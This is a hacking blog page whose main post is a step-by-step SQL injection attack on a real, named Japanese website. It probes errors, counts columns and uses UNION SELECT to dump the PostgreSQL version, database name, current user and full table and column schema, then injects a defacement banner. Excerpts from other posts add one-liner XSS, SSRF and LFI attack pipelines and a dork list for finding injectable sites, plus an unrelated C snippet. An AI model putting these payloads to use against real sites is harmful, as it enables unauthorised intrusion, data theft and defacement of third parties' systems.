Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...
Post a Comment

SQLi Challenges Solution

 

Please follow the steps 


===========Solution===========

http://zoutou(.)net/news_shousai.php?key=17

Let's start checking vulnerability adding '

http://zoutou(.)net/news_shousai.php?key=17'

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" at character 59 in /home/zoutou-web/public_html/news_shousai.php on line 99

This is the error.

Let's fix this.

http://zoutou(.)net/news_shousai.php?key=17'--+-

Not fixing

Let's try

http://zoutou(.)net/news_shousai.php?key=17--

Yes. Fixed.

As it fixes with --

Let's count columns.

http://zoutou(.)net/news_shousai.php?key=17 order by 1-- πŸ’‘

http://zoutou(.)net/news_shousai.php?key=17 order by 100-- πŸ’”

As 1 has no error

And 100 has error

So,  it means, it will work here

In 5 we got no error

In 6 we got error

So, total possible column is 5

Let's Union select

http://zoutou(.)net/news_shousai.php?key=17+AND+0+UNION+SELECT+1,2,3,4,5--

But still error.

Let's see which error is this.

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: argument of AND must be type boolean, not type integer in /home/zoutou-web/public_html/news_shousai.php on line 99

AND must be boolean.

This is the argument here.

We used And 0

Ok. Let's use and 1=0

As 1=0 is boolean.

πŸ™‚

But still error.

Let's see again which error is this.

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: UNION types text and integer cannot be matched in /home/zoutou-web/public_html/news_shousai.php on line 99

This argument says that, Union select shouldn't be an integer.

Ok. Let's make them string using '*'

In * use column.

Follow me.

Then

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+1,2,3,4,5--

Now,

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3','4','5'--

I hope you got it.

πŸ™‚

Ok. Let's check version.

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3',version(),'5'--

Here we got,

PostgreSQL 8.1.21 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-48)

It is postgree πŸ™‚

Ok let's print basic info.

Follow me.

http://zoutou(.)net/news_shousai.php?key=17+AND+1=0+UNION+SELECT+'1','2','3,database(),'5'--

Not able to print database. πŸ™‚

Let's change it to

current_database()

Yes πŸ™‚

zoutou123

Ok let's print user(). But as database() not working, i don't think that, user() will work.

In this case let's try, current_user

Ok let's print all in one column. In MySQL, we use , to separate the qeuries. but in postgree, we have to use || instead of a comma. like this,

'Injected By Fr0z3n F14m3'||'<br>'||version()||'<br>'||current_database()||'<br>'||current_user||'<br>'||123

full query::

http://zoutou(.)net/news_shousai.php?key=17 AND 0=1 UNION SELECT '1','2','<br><br><br><font color="red"><b>Injected By Fr0z3n F14m3<br>'||'<img src="https://avatars.githubusercontent.com/u/76582042?v=4" width=100 height=100>'||'<br>Version :: '||version()||'<br>Database Name :: '||current_database()||'<br>User Name :: '||current_user||'<br></b></font><br><br>'||(SELECT ARRAY_TO_STRING(array(SELECT('[....] '||table_name||' :: '||column_name)::TEXT FROM information_schema.columns WHERE table_schema='public'),'<br>')),'4','5'--+-

happy hacking.

Comments

Post a Comment

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

Image
Huge Sql injection Dork list By Shehzad Roy Just copy it and Followed it........... view_items.php?id= home.php?cat= item_book.php?CAT= www/index.php?page= schule/termine.php?view= goods_detail.php?data= storemanager/contents/item.php?page_code= view_items.php?id= customer/board.htm?mode= help/com_view.html?code= n_replyboard.php?typeboard= eng_board/view.php?T****= prev_results.php?prodID= bbs/view.php?no= gnu/?doc= zb/view.php?uid= global/product/product.php?gubun= m_view.php?ps_db= productlist.php?tid= product-list.php?id= onlinesales/product.php?product_id= garden_equipment/Fruit-Cage/product.php?pr= product.php?shopprodid= product_info.php?products_id= productlist.php?tid= showsub.php?id= productlist.php?fid= products.php?cat= products.php?cat= product-list.php?id= product.php?sku= store/product.php?productid= products.php?cat= productList.php?cat= product_detail.php?product_id= product.php?pid= view_items.php?id= more_details.php?id= county-facts/diary/vcsgen.php?id= idlechat/mes...
Read more

How to find index of the Array in C

 #include<stdio.h> int main() {              int i,num,s,flag=0;     int a[10];     printf("How many elements you want to enter :  ");     scanf("%d",&num);     printf("Enter %d elements in the Array ", num);     for(i=0; i<num; i++){     scanf("%d",&a[i]); } printf("Enter the Element you to Search : "); scanf("%d",&s); for(i=0; i<num; i++){ if(a[i]==s){ flag=1; break; } }  if (flag==0){ printf("Not Found "); }else { printf("Element Found "); for(i=0; i<num; i++){ if(a[i]==s) { printf("%d is Present at Location %d \n",s,i+1); break; } } } return 0; }     
Read more